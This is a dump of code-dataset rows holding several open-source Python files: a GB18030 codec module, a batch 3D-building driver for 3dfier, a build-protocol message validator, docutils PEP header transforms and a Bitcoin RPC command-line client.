repo_name stringlengths 5 100 | path stringlengths 4 294 | copies stringclasses 990
values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15
values |
|---|---|---|---|---|---|
vlinhd11/vlinhd11-android-scripting | python/src/Lib/encodings/gb18030.py | 816 | 1031 | #
# gb18030.py: Python Unicode Codec for GB18030
#
# Written by Hye-Shik Chang <perky@FreeBSD.org>
#
import _codecs_cn, codecs
import _multibytecodec as mbc
# The heavy lifting is done by the C implementation in _codecs_cn; the
# classes below only wire that codec object into the codecs framework.
codec = _codecs_cn.getcodec('gb18030')


class Codec(codecs.Codec):
    """Stateless encode/decode pair backed by the C gb18030 codec."""
    encode = codec.encode
    decode = codec.decode


class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,
                         codecs.IncrementalEncoder):
    # Incremental (chunk-by-chunk) encoding; state handled by _multibytecodec.
    codec = codec


class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,
                         codecs.IncrementalDecoder):
    # Incremental (chunk-by-chunk) decoding; state handled by _multibytecodec.
    codec = codec


class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):
    codec = codec


class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):
    codec = codec


def getregentry():
    """Return the CodecInfo record the codec registry uses for 'gb18030'."""
    return codecs.CodecInfo(
        name='gb18030',
        encode=Codec().encode,
        decode=Codec().decode,
        incrementalencoder=IncrementalEncoder,
        incrementaldecoder=IncrementalDecoder,
        streamreader=StreamReader,
        streamwriter=StreamWriter,
    )
| apache-2.0 |
balazsdukai/batch3dfier | batch3dfier/batch3dfierapp.py | 1 | 11644 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
"""The batch3dfier application."""
import os.path
import queue
import threading
import time
import warnings
import argparse
from subprocess import call
import logging
import yaml
from psycopg2 import sql
from batch3dfier import config
from batch3dfier import db
def parse_console_args():
    """Parse the command line.

    Returns a dict with 'cfg_file' (absolute path to the YAML config),
    'cfg_dir' (its directory) and 'threads' (worker-thread count, int).
    """
    parser = argparse.ArgumentParser(description="Batch 3dfy 2D datasets.")
    parser.add_argument(
        "path",
        help="The YAML config file for batch3dfier. See batch3dfier_config.yml for an example.")
    parser.add_argument(
        "-t", "--threads",
        help="The number of threads to run.",
        default=3,
        type=int)
    parsed = parser.parse_args()
    cfg_file = os.path.abspath(parsed.path)
    return {
        'cfg_file': cfg_file,
        'cfg_dir': os.path.dirname(cfg_file),
        'threads': parsed.threads,
    }
def parse_config_yaml(args_in):
    """Read the batch3dfier YAML config and return a normalised settings dict.

    :param args_in: dict from parse_console_args() ('cfg_file', 'cfg_dir', ...)
    :returns: dict with pointcloud / tile-index / output settings, an open
        database connection under 'dbase', and exactly one of 'extent_file'
        or 'tiles' set (the other is None).

    Fixes over the original:
    - the config file handle is now closed (with-statement);
    - yaml.safe_load() instead of yaml.load() (no arbitrary Python object
      construction from an untrusted config file);
    - EXTENT_FILE could be referenced before assignment (NameError) when
      'extent' held a real path;
    - cfg['user_schema'] was never set when both 'user_schema' and 'extent'
      were provided, causing a KeyError later in main().
    """
    cfg = {}
    with open(args_in['cfg_file'], "r") as stream:
        cfg_stream = yaml.safe_load(stream)
    cfg['pc_file_name'] = cfg_stream["input_elevation"]["dataset_name"]
    cfg['pc_dir'] = os.path.abspath(
        cfg_stream["input_elevation"]["dataset_dir"])
    cfg['pc_tile_case'] = cfg_stream["input_elevation"]["tile_case"]
    cfg['polygons'] = cfg_stream['tile_index']['polygons']
    cfg['elevation'] = cfg_stream['tile_index']['elevation']
    OUTPUT_FORMAT = cfg_stream["output"]["format"]
    if all(f not in OUTPUT_FORMAT.lower() for f in ["csv", "obj"]):
        warnings.warn(
            "\n No file format is appended to output. Currently only .obj or .csv is handled.\n")
    cfg['output_format'] = OUTPUT_FORMAT
    cfg['output_dir'] = os.path.abspath(cfg_stream["output"]["dir"])
    if 'CSV-BUILDINGS-MULTIPLE' == cfg['output_format']:
        cfg['out_schema'] = cfg_stream["output"]["schema"]
        cfg['out_table'] = cfg_stream["output"]["table"]
    else:
        # OBJ is not imported into postgres
        cfg['out_schema'] = None
        cfg['out_table'] = None
    cfg['path_3dfier'] = cfg_stream["path_3dfier"]
    EXTENT_FILE = None  # stays None unless a usable 'extent' is configured
    try:
        # in case user gave " " or "" for 'extent'
        if len(cfg_stream["input_polygons"]["extent"]) > 1:
            EXTENT_FILE = cfg_stream["input_polygons"]["extent"]
        cfg['extent_file'] = os.path.abspath(
            cfg_stream["input_polygons"]["extent"])
        cfg['tiles'] = None
    except (NameError, AttributeError, TypeError):
        # 'extent' is missing/None -> fall back to an explicit tile list.
        tile_list = cfg_stream["input_polygons"]["tile_list"]
        assert isinstance(
            tile_list, list), "Please provide input for tile_list as a list: [...]"
        cfg['tiles'] = tile_list
        cfg['extent_file'] = None
    # 'user_schema' is used for the '_clip3dfy_' and '_union' views, thus
    # only use 'user_schema' if 'extent' is provided
    cfg['tile_schema'] = cfg_stream["input_polygons"]["tile_schema"]
    USER_SCHEMA = cfg_stream["input_polygons"]["user_schema"]
    if (USER_SCHEMA is None) or (EXTENT_FILE is None):
        cfg['user_schema'] = cfg['tile_schema']
    else:
        cfg['user_schema'] = USER_SCHEMA
    # Connect to database ----------------------------------------------------
    cfg['dbase'] = db.db(
        dbname=cfg_stream["database"]["dbname"],
        host=str(cfg_stream["database"]["host"]),
        port=cfg_stream["database"]["port"],
        user=cfg_stream["database"]["user"],
        password=cfg_stream["database"]["pw"])
    cfg['uniqueid'] = cfg_stream["input_polygons"]['uniqueid']
    cfg['prefix_tile_footprint'] = cfg_stream["input_polygons"]["tile_prefix"]
    return cfg
def main():
    """Batch-3dfy the configured tiles using a pool of worker threads.

    Reads the YAML config named on the command line, determines the set of
    2D tile views to process (from an 'extent' polygon or an explicit
    'tile_list'), runs 3dfier on them in parallel, then drops the temporary
    views/config files and logs a summary.

    Fixes over the original: the TypeError for a config with neither
    'extent' nor 'tile_list' was constructed but never raised; the
    wait-for-queue loop busy-spun a full core.
    """
    # Prefix for naming the clipped/united views. This value shouldn't be a
    # substring in the pointcloud file names.
    CLIP_PREFIX = "_clip3dfy_"
    # Defaults passed to call_3dfier(); overwritten in 'extent' mode.
    tile_out = None
    ewkb = None
    union_view = None
    tiles_clipped = None
    args_in = parse_console_args()
    cfg = parse_config_yaml(args_in)
    dbase = cfg['dbase']
    tiles = cfg['tiles']
    logfile = os.path.join(cfg['output_dir'], 'batch3dfier.log')
    logging.basicConfig(filename=logfile,
                        filemode='a',
                        level=logging.INFO,
                        format='%(asctime)s - %(levelname)s - %(message)s')
    # =========================================================================
    # Get tile list if 'extent' provided
    # =========================================================================
    # TODO: assert that CREATE/DROP allowed on TILE_SCHEMA and/or USER_SCHEMA
    if cfg['extent_file']:
        poly, ewkb = config.extent_to_ewkb(dbase, cfg['polygons'],
                                           cfg['extent_file'])
        tiles = config.get_2Dtiles(dbase, cfg['polygons'],
                                   cfg['polygons']['fields'], ewkb)
        # Get view names for tiles
        tile_views = config.get_2Dtile_views(dbase, cfg['tile_schema'], tiles)
        view_fields = config.get_view_fields(
            dbase, cfg['tile_schema'], tile_views)
        # clip 2D tiles to extent
        tiles_clipped = config.clip_2Dtiles(dbase, cfg['user_schema'],
                                            cfg['tile_schema'],
                                            tile_views, poly,
                                            CLIP_PREFIX,
                                            view_fields)
        # if the area of the extent is less than that of a tile, union the
        # tiles if the extent spans over many
        tile_area = config.get_2Dtile_area(dbase, cfg['polygons'])
        if len(tiles_clipped) > 1 and poly.area < tile_area:
            union_view = config.union_2Dtiles(dbase, cfg['user_schema'],
                                              tiles_clipped, CLIP_PREFIX,
                                              view_fields)
            tile_out = "output_batch3dfier"
        else:
            union_view = []
    elif tiles:
        # ======================================================================
        # Get tile list if 'tile_list' = 'all'
        # ======================================================================
        if 'all' in tiles:
            schema_q = sql.Identifier(cfg['polygons']['schema'])
            table_q = sql.Identifier(cfg['polygons']['table'])
            unit_q = sql.Identifier(cfg['polygons']['fields']['unit_name'])
            query = sql.SQL("""
                SELECT {unit}
                FROM {schema}.{table};
                """).format(schema=schema_q, table=table_q,
                            unit=unit_q)
            resultset = dbase.getQuery(query)
            tiles = [tile[0] for tile in resultset]
            tile_views = config.get_2Dtile_views(dbase, cfg['tile_schema'],
                                                 tiles)
        else:
            tile_views = config.get_2Dtile_views(dbase, cfg['tile_schema'],
                                                 tiles)
    else:
        # BUG FIX: the exception was previously created but never raised,
        # which let execution continue and crash later on an unbound
        # 'tile_views'.
        raise TypeError("Please provide either 'extent' or 'tile_list' in config.")
    # =========================================================================
    # Process multiple threads
    # reference: http://www.tutorialspoint.com/python3/python_multithreading.htm
    # =========================================================================
    exitFlag = 0
    tiles_skipped = []
    out_paths = []

    class myThread (threading.Thread):
        """Worker thread: pulls tile names from the shared queue and 3dfies them."""

        def __init__(self, threadID, name, q):
            threading.Thread.__init__(self)
            self.threadID = threadID
            self.name = name
            self.q = q

        def run(self):
            print("Starting " + self.name)
            process_data(self.name, self.q)
            print("Exiting " + self.name)

    def process_data(threadName, q):
        # Poll the shared queue until main() flips exitFlag after the queue
        # has drained; queueLock guards the empty()/get() pair.
        while not exitFlag:
            queueLock.acquire()
            if not workQueue.empty():
                tile = q.get()
                queueLock.release()
                print("%s processing %s" % (threadName, tile))
                t = config.call_3dfier(
                    db=dbase,
                    tile=tile,
                    schema_tiles=cfg['user_schema'],
                    pc_file_name=cfg['pc_file_name'],
                    pc_tile_case=cfg['pc_tile_case'],
                    pc_dir=cfg['pc_dir'],
                    table_index_pc=cfg['elevation'],
                    fields_index_pc=cfg['elevation']['fields'],
                    table_index_footprint=cfg['polygons'],
                    fields_index_footprint=cfg['polygons']['fields'],
                    uniqueid=cfg['uniqueid'],
                    extent_ewkb=ewkb,
                    clip_prefix=CLIP_PREFIX,
                    prefix_tile_footprint=cfg['prefix_tile_footprint'],
                    yml_dir=args_in['cfg_dir'],
                    tile_out=tile_out,
                    output_format=cfg['output_format'],
                    output_dir=cfg['output_dir'],
                    path_3dfier=cfg['path_3dfier'],
                    thread=threadName)
                if t['tile_skipped'] is not None:
                    tiles_skipped.append(t['tile_skipped'])
                else:
                    out_paths.append(t['out_path'])
            else:
                queueLock.release()
                time.sleep(1)

    # Prep
    threadList = ["Thread-" + str(t + 1) for t in range(args_in['threads'])]
    queueLock = threading.Lock()
    workQueue = queue.Queue(0)
    threads = []
    threadID = 1
    # Create new threads
    for tName in threadList:
        thread = myThread(threadID, tName, workQueue)
        thread.start()
        threads.append(thread)
        threadID += 1
    # Fill the queue: a single union view, the clipped tiles, or plain views.
    queueLock.acquire()
    if union_view:
        workQueue.put(union_view)
    elif tiles_clipped:
        for tile in tiles_clipped:
            workQueue.put(tile)
    else:
        for tile in tile_views:
            workQueue.put(tile)
    queueLock.release()
    # Wait for queue to empty (sleep instead of the original busy-wait).
    while not workQueue.empty():
        time.sleep(0.1)
    # Notify threads it's time to exit
    exitFlag = 1
    # Wait for all threads to complete
    for t in threads:
        t.join()
    print("Exiting Main Thread")
    # Drop temporary views that reference the clipped extent
    if union_view:
        tiles_clipped.append(union_view)
    if tiles_clipped:
        config.drop_2Dtiles(
            dbase,
            cfg['user_schema'],
            views_to_drop=tiles_clipped)
    # Delete temporary per-thread config files
    yml_cfg = [
        os.path.join(args_in['cfg_dir'], t + "_config.yml")
        for t in threadList]
    command = "rm"
    for c in yml_cfg:
        command = command + " " + c
    call(command, shell=True)
    # =========================================================================
    # Reporting
    # =========================================================================
    tiles = set(tiles)
    tiles_skipped = set(tiles_skipped)
    logging.info("Total number of tiles processed: %s",
                 str(len(tiles.difference(tiles_skipped))))
    logging.info("Tiles skipped: %s", tiles_skipped)


if __name__ == '__main__':
    main()
| gpl-3.0 |
perryl/morph | distbuild/protocol.py | 2 | 3506 | # distbuild/protocol.py -- abstractions for the JSON messages
#
# Copyright (C) 2012, 2014-2015 Codethink Limited
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; version 2 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program. If not, see <http://www.gnu.org/licenses/>.
'''Construct protocol message objects (dicts).'''
# Version refers to an integer that should be incremented by one each time a
# time a change is introduced that would break server/initiator compatibility
VERSION = 4


# Fields that MUST be present in each message type's body.
_required_fields = {
    'build-request': [
        'id',
        'repo',
        'ref',
        'morphology',
        'partial',
        'protocol_version',
        'allow_detach',
    ],
    'build-progress': [
        'id',
        'message',
    ],
    'step-started': [
        'id',
        'step_name',
        'worker_name',
    ],
    'build-started': [
        'id',
    ],
    'step-already-started': [
        'id',
        'step_name',
        'worker_name',
    ],
    'step-output': [
        'id',
        'step_name',
        'stdout',
        'stderr',
    ],
    'step-finished': [
        'id',
        'step_name',
        'worker_name',
    ],
    'step-failed': [
        'id',
        'step_name',
    ],
    'build-finished': [
        'id',
        'urls',
    ],
    'build-failed': [
        'id',
        'reason',
    ],
    'build-cancelled': [
        'id',
    ],
    'exec-request': [
        'id',
        'argv',
        'stdin_contents',
    ],
    'exec-cancel': [
        'id',
    ],
    'http-request': [
        'id',
        'url',
        'method',
        'headers',
        'body',
    ],
    'list-requests': [
        'id',
        'protocol_version',
    ],
    'request-output': [
        'message',
    ],
    'build-cancel': [
        'id',
        'protocol_version',
    ],
    'build-status': [
        'id',
        'protocol_version',
    ],
    'graphing-started': [
        'id',
    ],
    'graphing-finished': [
        'id'
    ],
    'cache-state': [
        'id',
        'unbuilt',
        'total'
    ]
}

# Fields that MAY additionally appear in a message type's body.
_optional_fields = {
    'build-request': [
        'original_ref',
        'component_names'
    ]
}


def _validate(message_type, **kwargs):
    """Assert that `kwargs` forms a valid body for `message_type`.

    Note: an unknown message type raises KeyError on the lookup below
    (before any assertion), so callers that only catch AssertionError —
    such as is_valid_message() — deliberately do not swallow it.
    """
    required_fields = _required_fields[message_type]
    optional_fields = _optional_fields.get(message_type, [])
    assert message_type in _required_fields
    for name in required_fields:
        assert name in kwargs, 'field %s is required' % name
    for name in kwargs:
        assert (name in required_fields or name in optional_fields), \
            'field %s is not allowed' % name


def message(message_type, **kwargs):
    """Build a protocol message dict of `message_type` from `kwargs`.

    Raises AssertionError when a required field is missing or an unknown
    field is supplied.
    """
    _validate(message_type, **kwargs)
    result = dict(kwargs)
    result['type'] = message_type
    return result


def is_valid_message(msg):
    """Return True iff `msg` is a well-formed protocol message dict."""
    if 'type' not in msg:
        return False
    # Temporarily strip 'type' so the remaining items can be validated as
    # the message body; always put it back.
    msg_type = msg.pop('type')
    try:
        _validate(msg_type, **msg)
        return True
    except AssertionError:
        return False
    finally:
        msg['type'] = msg_type
| gpl-2.0 |
timonwong/OmniMarkupPreviewer | OmniMarkupLib/Renderers/libs/python3/docutils/transforms/peps.py | 4 | 11023 | # $Id$
# Author: David Goodger <goodger@python.org>
# Copyright: This module has been placed in the public domain.
"""
Transforms for PEP processing.
- `Headers`: Used to transform a PEP's initial RFC-2822 header. It remains a
field list, but some entries get processed.
- `Contents`: Auto-inserts a table of contents.
- `PEPZero`: Special processing for PEP 0.
"""
__docformat__ = 'reStructuredText'
import sys
import os
import re
import time
from docutils import nodes, utils, languages
from docutils import ApplicationError, DataError
from docutils.transforms import Transform, TransformError
from docutils.transforms import parts, references, misc
class Headers(Transform):
"""
Process fields in a PEP's initial RFC-2822 header.
"""
default_priority = 360
# URL templates for linking PEP numbers and their CVS history.
pep_url = 'pep-%04d'
pep_cvs_url = ('http://svn.python.org/view/*checkout*'
'/peps/trunk/pep-%04d.txt')
# (pattern, replacement) pairs that strip RCS keyword noise such as
# "$RCSfile: ...,v $" from Last-Modified/Version field values.
rcs_keyword_substitutions = (
(re.compile(r'\$' r'RCSfile: (.+),v \$$', re.IGNORECASE), r'\1'),
(re.compile(r'\$[a-zA-Z]+: (.+) \$$'), r'\1'),)
# apply(): validate that the document starts with an RFC-2822 field list,
# parse the "PEP" field, then rewrite the remaining header fields in place
# (mask emails, link PEP references, attach dates to the CVS history URL).
def apply(self):
if not len(self.document):
# @@@ replace these DataErrors with proper system messages
raise DataError('Document tree is empty.')
header = self.document[0]
if not isinstance(header, nodes.field_list) or \
'rfc2822' not in header['classes']:
raise DataError('Document does not begin with an RFC-2822 '
'header; it is not a PEP.')
pep = None
# First pass: locate the "PEP" field and parse its number; a non-integer
# value is reported as a warning and marked problematic inline.
for field in header:
if field[0].astext().lower() == 'pep': # should be the first field
value = field[1].astext()
try:
pep = int(value)
cvs_url = self.pep_cvs_url % pep
except ValueError:
pep = value
cvs_url = None
msg = self.document.reporter.warning(
'"PEP" header must contain an integer; "%s" is an '
'invalid value.' % pep, base_node=field)
msgid = self.document.set_id(msg)
prb = nodes.problematic(value, value or '(none)',
refid=msgid)
prbid = self.document.set_id(prb)
msg.add_backref(prbid)
if len(field[1]):
field[1][0][:] = [prb]
else:
field[1] += nodes.paragraph('', '', prb)
break
if pep is None:
raise DataError('Document does not contain an RFC-2822 "PEP" '
'header.')
# PEP 0 (the index) needs extra processing: schedule the PEPZero
# transform via a pending node right after the header.
if pep == 0:
# Special processing for PEP 0.
pending = nodes.pending(PEPZero)
self.document.insert(1, pending)
self.document.note_pending(pending)
if len(header) < 2 or header[1][0].astext().lower() != 'title':
raise DataError('No title!')
# Second pass: per-field rewriting. NOTE: cvs_url is always bound here,
# because a missing "PEP" field raised DataError above.
for field in header:
name = field[0].astext().lower()
body = field[1]
if len(body) > 1:
raise DataError('PEP header field body contains multiple '
'elements:\n%s' % field.pformat(level=1))
elif len(body) == 1:
if not isinstance(body[0], nodes.paragraph):
raise DataError('PEP header field body may only contain '
'a single paragraph:\n%s'
% field.pformat(level=1))
# Empty Last-Modified field: fill it with the source file's mtime
# (os.stat index 8), linked to the CVS history when available.
elif name == 'last-modified':
date = time.strftime(
'%d-%b-%Y',
time.localtime(os.stat(self.document['source'])[8]))
if cvs_url:
body += nodes.paragraph(
'', '', nodes.reference('', date, refuri=cvs_url))
else:
# empty
continue
para = body[0]
if name == 'author':
for node in para:
if isinstance(node, nodes.reference):
node.replace_self(mask_email(node))
elif name == 'discussions-to':
for node in para:
if isinstance(node, nodes.reference):
node.replace_self(mask_email(node, pep))
# Turn each referenced PEP number into a link to that PEP.
elif name in ('replaces', 'replaced-by', 'requires'):
newbody = []
space = nodes.Text(' ')
for refpep in re.split(',?\s+', body.astext()):
pepno = int(refpep)
newbody.append(nodes.reference(
refpep, refpep,
refuri=(self.document.settings.pep_base_url
+ self.pep_url % pepno)))
newbody.append(space)
para[:] = newbody[:-1] # drop trailing space
elif name == 'last-modified':
utils.clean_rcs_keywords(para, self.rcs_keyword_substitutions)
if cvs_url:
date = para.astext()
para[:] = [nodes.reference('', date, refuri=cvs_url)]
# Link the Content-Type value to PEP 12 (the format specification).
elif name == 'content-type':
pep_type = para.astext()
uri = self.document.settings.pep_base_url + self.pep_url % 12
para[:] = [nodes.reference('', pep_type, refuri=uri)]
elif name == 'version' and len(body):
utils.clean_rcs_keywords(para, self.rcs_keyword_substitutions)
class Contents(Transform):

    """
    Insert an empty table of contents topic and a transform placeholder into
    the document after the RFC 2822 header.
    """

    default_priority = 380

    def apply(self):
        lang = languages.get_language(self.document.settings.language_code,
                                      self.document.reporter)
        label = lang.labels['contents']
        topic = nodes.topic('', nodes.title('', label), classes=['contents'])
        normalized = nodes.fully_normalize_name(label)
        if not self.document.has_name(normalized):
            topic['names'].append(normalized)
        self.document.note_implicit_target(topic)
        # The ToC itself is generated later by the parts.Contents transform;
        # only a pending placeholder is inserted here.
        placeholder = nodes.pending(parts.Contents)
        topic += placeholder
        self.document.insert(1, topic)
        self.document.note_pending(placeholder)
class TargetNotes(Transform):
"""
Locate the "References" section, insert a placeholder for an external
target footnote insertion transform at the end, and schedule the
transform to run immediately.
"""
default_priority = 520
def apply(self):
doc = self.document
i = len(doc) - 1
# Scan trailing top-level sections from the end for "References",
# remembering where a "Copyright" section sits on the way.
# NOTE(review): 'copyright' shadows the builtin and holds an index
# (falsy when 0) — kept as-is here.
refsect = copyright = None
while i >= 0 and isinstance(doc[i], nodes.section):
title_words = doc[i][0].astext().lower().split()
if 'references' in title_words:
refsect = doc[i]
break
elif 'copyright' in title_words:
copyright = i
i -= 1
# No "References" section found: create one.
if not refsect:
refsect = nodes.section()
refsect += nodes.title('', 'References')
doc.set_id(refsect)
if copyright:
# Put the new "References" section before "Copyright":
doc.insert(copyright, refsect)
else:
# Put the new "References" section at end of doc:
doc.append(refsect)
# Schedule the footnote-insertion transform (priority 0) followed by a
# callback (priority 1) that removes the section if it stays empty.
pending = nodes.pending(references.TargetNotes)
refsect.append(pending)
self.document.note_pending(pending, 0)
pending = nodes.pending(misc.CallBack,
details={'callback': self.cleanup_callback})
refsect.append(pending)
self.document.note_pending(pending, 1)
def cleanup_callback(self, pending):
"""
Remove an empty "References" section.
Called after the `references.TargetNotes` transform is complete.
"""
if len(pending.parent) == 2: # <title> and <pending>
pending.parent.parent.remove(pending.parent)
class PEPZero(Transform):

    """
    Special processing for PEP 0.
    """

    default_priority = 760

    def apply(self):
        # Walk the whole tree with the PEP-0 visitor, then remove the
        # pending node that triggered this transform.
        self.document.walk(PEPZeroSpecial(self.document))
        self.startnode.parent.remove(self.startnode)
class PEPZeroSpecial(nodes.SparseNodeVisitor):

    """
    Perform the special processing needed by PEP 0:

    - Mask email addresses.

    - Link PEP numbers in the second column of 4-column tables to the PEPs
      themselves.
    """

    pep_url = Headers.pep_url

    def unknown_visit(self, node):
        """Ignore every node type not handled explicitly below."""
        pass

    def visit_reference(self, node):
        # Mask any email address carried by the reference.
        node.replace_self(mask_email(node))

    def visit_field_list(self, node):
        # Leave the RFC-2822 header untouched.
        if 'rfc2822' in node['classes']:
            raise nodes.SkipNode

    def visit_tgroup(self, node):
        # PEP listings live in 4-column tables; remember that and reset the
        # per-row entry counter.
        self.pep_table = node['cols'] == 4
        self.entry = 0

    def visit_colspec(self, node):
        self.entry += 1
        if self.pep_table and self.entry == 2:
            node['classes'].append('num')

    def visit_row(self, node):
        self.entry = 0

    def visit_entry(self, node):
        self.entry += 1
        # Second cell of each row in a PEP table holds the PEP number.
        if self.pep_table and self.entry == 2 and len(node) == 1:
            node['classes'].append('num')
            p = node[0]
            if isinstance(p, nodes.paragraph) and len(p) == 1:
                text = p.astext()
                try:
                    pep = int(text)
                    ref = (self.document.settings.pep_base_url
                           + self.pep_url % pep)
                    p[0] = nodes.reference(text, text, refuri=ref)
                except ValueError:
                    # Not a PEP number; leave the cell unchanged.
                    pass
# Well-known public mailing-list addresses that mask_email() leaves unmasked.
non_masked_addresses = ('peps@python.org',
'python-list@python.org',
'python-dev@python.org')
def mask_email(ref, pepno=None):
    """
    Mask the email address in `ref` and return a replacement node.

    `ref` is returned unchanged if it contains no email address.

    For email addresses such as "user@host", mask the address as "user at
    host" (text) to thwart simple email address harvesters (except for those
    listed in `non_masked_addresses`). If a PEP number (`pepno`) is given,
    return a reference including a default email subject.
    """
    if ref.hasattr('refuri') and ref['refuri'].startswith('mailto:'):
        # BUG FIX: the address starts right after 'mailto:' (7 characters);
        # the original sliced at [8:], dropping the address's first character
        # and making the non_masked_addresses whitelist unreachable.
        if ref['refuri'][len('mailto:'):] in non_masked_addresses:
            replacement = ref[0]
        else:
            replacement_text = ref.astext().replace('@', ' at ')
            replacement = nodes.raw('', replacement_text, format='html')
        if pepno is None:
            return replacement
        else:
            # '%%20' yields a literal '%20' (URL-encoded space) after the
            # %-formatting of pepno.
            ref['refuri'] += '?subject=PEP%%20%s' % pepno
            ref[:] = [replacement]
            return ref
    else:
        return ref
| mit |
CCPorg/ALU-AluminiumCoin-Original | contrib/bitrpc/bitrpc.py | 2348 | 7835 | from jsonrpc import ServiceProxy
import sys
import string
# ===== BEGIN USER SETTINGS =====
# if you do not set these you will be prompted for a password for every command
rpcuser = ""
rpcpass = ""
# ====== END USER SETTINGS ======
if rpcpass == "":
access = ServiceProxy("http://127.0.0.1:8332")
else:
access = ServiceProxy("http://"+rpcuser+":"+rpcpass+"@127.0.0.1:8332")
cmd = sys.argv[1].lower()
if cmd == "backupwallet":
try:
path = raw_input("Enter destination path/filename: ")
print access.backupwallet(path)
except:
print "\n---An error occurred---\n"
elif cmd == "getaccount":
try:
addr = raw_input("Enter a Bitcoin address: ")
print access.getaccount(addr)
except:
print "\n---An error occurred---\n"
elif cmd == "getaccountaddress":
try:
acct = raw_input("Enter an account name: ")
print access.getaccountaddress(acct)
except:
print "\n---An error occurred---\n"
elif cmd == "getaddressesbyaccount":
try:
acct = raw_input("Enter an account name: ")
print access.getaddressesbyaccount(acct)
except:
print "\n---An error occurred---\n"
elif cmd == "getbalance":
try:
acct = raw_input("Enter an account (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getbalance(acct, mc)
except:
print access.getbalance()
except:
print "\n---An error occurred---\n"
elif cmd == "getblockbycount":
try:
height = raw_input("Height: ")
print access.getblockbycount(height)
except:
print "\n---An error occurred---\n"
elif cmd == "getblockcount":
try:
print access.getblockcount()
except:
print "\n---An error occurred---\n"
elif cmd == "getblocknumber":
try:
print access.getblocknumber()
except:
print "\n---An error occurred---\n"
elif cmd == "getconnectioncount":
try:
print access.getconnectioncount()
except:
print "\n---An error occurred---\n"
elif cmd == "getdifficulty":
try:
print access.getdifficulty()
except:
print "\n---An error occurred---\n"
elif cmd == "getgenerate":
try:
print access.getgenerate()
except:
print "\n---An error occurred---\n"
elif cmd == "gethashespersec":
try:
print access.gethashespersec()
except:
print "\n---An error occurred---\n"
elif cmd == "getinfo":
try:
print access.getinfo()
except:
print "\n---An error occurred---\n"
elif cmd == "getnewaddress":
try:
acct = raw_input("Enter an account name: ")
try:
print access.getnewaddress(acct)
except:
print access.getnewaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "getreceivedbyaccount":
try:
acct = raw_input("Enter an account (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getreceivedbyaccount(acct, mc)
except:
print access.getreceivedbyaccount()
except:
print "\n---An error occurred---\n"
elif cmd == "getreceivedbyaddress":
try:
addr = raw_input("Enter a Bitcoin address (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getreceivedbyaddress(addr, mc)
except:
print access.getreceivedbyaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "gettransaction":
try:
txid = raw_input("Enter a transaction ID: ")
print access.gettransaction(txid)
except:
print "\n---An error occurred---\n"
elif cmd == "getwork":
try:
data = raw_input("Data (optional): ")
try:
print access.gettransaction(data)
except:
print access.gettransaction()
except:
print "\n---An error occurred---\n"
elif cmd == "help":
try:
cmd = raw_input("Command (optional): ")
try:
print access.help(cmd)
except:
print access.help()
except:
print "\n---An error occurred---\n"
elif cmd == "listaccounts":
try:
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.listaccounts(mc)
except:
print access.listaccounts()
except:
print "\n---An error occurred---\n"
elif cmd == "listreceivedbyaccount":
try:
mc = raw_input("Minimum confirmations (optional): ")
incemp = raw_input("Include empty? (true/false, optional): ")
try:
print access.listreceivedbyaccount(mc, incemp)
except:
print access.listreceivedbyaccount()
except:
print "\n---An error occurred---\n"
elif cmd == "listreceivedbyaddress":
try:
mc = raw_input("Minimum confirmations (optional): ")
incemp = raw_input("Include empty? (true/false, optional): ")
try:
print access.listreceivedbyaddress(mc, incemp)
except:
print access.listreceivedbyaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "listtransactions":
try:
acct = raw_input("Account (optional): ")
count = raw_input("Number of transactions (optional): ")
frm = raw_input("Skip (optional):")
try:
print access.listtransactions(acct, count, frm)
except:
print access.listtransactions()
except:
print "\n---An error occurred---\n"
elif cmd == "move":
try:
frm = raw_input("From: ")
to = raw_input("To: ")
amt = raw_input("Amount:")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
try:
print access.move(frm, to, amt, mc, comment)
except:
print access.move(frm, to, amt)
except:
print "\n---An error occurred---\n"
elif cmd == "sendfrom":
try:
frm = raw_input("From: ")
to = raw_input("To: ")
amt = raw_input("Amount:")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
commentto = raw_input("Comment-to (optional): ")
try:
print access.sendfrom(frm, to, amt, mc, comment, commentto)
except:
print access.sendfrom(frm, to, amt)
except:
print "\n---An error occurred---\n"
elif cmd == "sendmany":
try:
frm = raw_input("From: ")
to = raw_input("To (in format address1:amount1,address2:amount2,...): ")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
try:
print access.sendmany(frm,to,mc,comment)
except:
print access.sendmany(frm,to)
except:
print "\n---An error occurred---\n"
elif cmd == "sendtoaddress":
try:
to = raw_input("To (in format address1:amount1,address2:amount2,...): ")
amt = raw_input("Amount:")
comment = raw_input("Comment (optional): ")
commentto = raw_input("Comment-to (optional): ")
try:
print access.sendtoaddress(to,amt,comment,commentto)
except:
print access.sendtoaddress(to,amt)
except:
print "\n---An error occurred---\n"
elif cmd == "setaccount":
try:
addr = raw_input("Address: ")
acct = raw_input("Account:")
print access.setaccount(addr,acct)
except:
print "\n---An error occurred---\n"
elif cmd == "setgenerate":
try:
gen= raw_input("Generate? (true/false): ")
cpus = raw_input("Max processors/cores (-1 for unlimited, optional):")
try:
print access.setgenerate(gen, cpus)
except:
print access.setgenerate(gen)
except:
print "\n---An error occurred---\n"
elif cmd == "settxfee":
try:
amt = raw_input("Amount:")
print access.settxfee(amt)
except:
print "\n---An error occurred---\n"
elif cmd == "stop":
try:
print access.stop()
except:
print "\n---An error occurred---\n"
